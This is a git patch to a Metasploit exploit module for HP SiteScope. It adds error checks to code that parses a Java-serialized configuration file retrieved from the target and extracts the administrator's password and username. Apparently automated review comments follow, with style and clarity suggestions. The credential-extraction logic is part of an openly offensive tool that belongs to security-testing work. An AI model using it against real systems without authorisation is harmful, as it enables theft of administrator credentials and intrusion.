From 2f87af1c3a405b25957d6722895fc1e2eedbc820 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Wed, 5 Sep 2012 20:58:55 +0200
Subject: [PATCH] add some checks while parsing the java serialization config file
---
 .../http/hp_sitescope_uploadfileshandler.rb | 23 +++++++++++++++++--
 1 file changed, 21 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/windows/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/windows/http/hp_sitescope_uploadfileshandler.rb
index 38b260ace1..37c9e19578 100644
--- a/modules/exploits/windows/http/hp_sitescope_uploadfileshandler.rb
+++ b/modules/exploits/windows/http/hp_sitescope_uploadfileshandler.rb
@@ -91,9 +91,19 @@ class Metasploit3 < Msf::Exploit::Remote
 admin_data = conf.split("\x03\x5F\x69\x64\x74\x00\x0D\x61\x64\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F\x72\x74\x00")[1]
- admin_password = admin_data.split(/\x09_passwordt\x00/)[1]
- password_length = admin_password.unpack("C").first
+ if not admin_data or admin_data.empty?
+ print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
+ return
+ end
+ admin_password = admin_data.split(/\x09_passwordt\x00/)[1]
+
+ if not admin_password or admin_password.empty?
+ print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
+ return
+ end
+
+ password_length = admin_password.unpack("C").first
 if password_length > 0
 password = admin_password[1, password_length]
 else
@@ -102,7 +112,16 @@ class Metasploit3 < Msf::Exploit::Remote
 admin_user_type, admin_user = admin_password.split(/\x06(_login[q|t])\x00/)[1, 2]
+ if not admin_user_type or admin_user_type.empty?
+ print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
+ return
+ end
+
 if admin_user_type == "_logint"
+ if not admin_user or admin_user.empty?
+ print_error("#{@peer} - Error retrieving the HP SiteScope administrator credentials")
+ return
+ end
 user_length = admin_user.unpack("C").first
 else
 user_length = 0
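Review bot: All four added guards print the identical string `Error retrieving the HP SiteScope administrator credentials` (two in the hunk at -91,9 +91,19 and two in the hunk at -102,7 +112,16), so a failed run does not say which field of the config could not be parsed. Giving each guard its own text, for example `print_error("#{@peer} - administrator record not found in the configuration")` for the `admin_data` check and a `_password field not found` variant for the `admin_password` check, keeps the log usable for troubleshooting. The `if not x or x.empty?` form also leans on the low-precedence `not`/`or` keywords; `if x.nil? || x.empty?` is the conventional Ruby spelling. The enclosing method starts and ends outside both hunks.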
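Review bot: The parsing in the hunk at -102,7 +112,16 has no comment explaining the byte markers it depends on, and the new guards make the `_logint` branch harder to follow without one. The `t`/`q` suffix captured by the context regex looks like the Java serialization type codes TC_STRING (0x74) and TC_REFERENCE (0x71), which would explain why only the `_logint` branch reads a length byte; once confirmed, a comment such as `# 't' = TC_STRING (inline value follows), 'q' = TC_REFERENCE (back-reference, no inline value)` above `if admin_user_type == "_logint"` would record that. Separately, the character class `[q|t]` in that context line also accepts a literal `|`; `[qt]` is presumably what was meant. The method body continues outside the hunk.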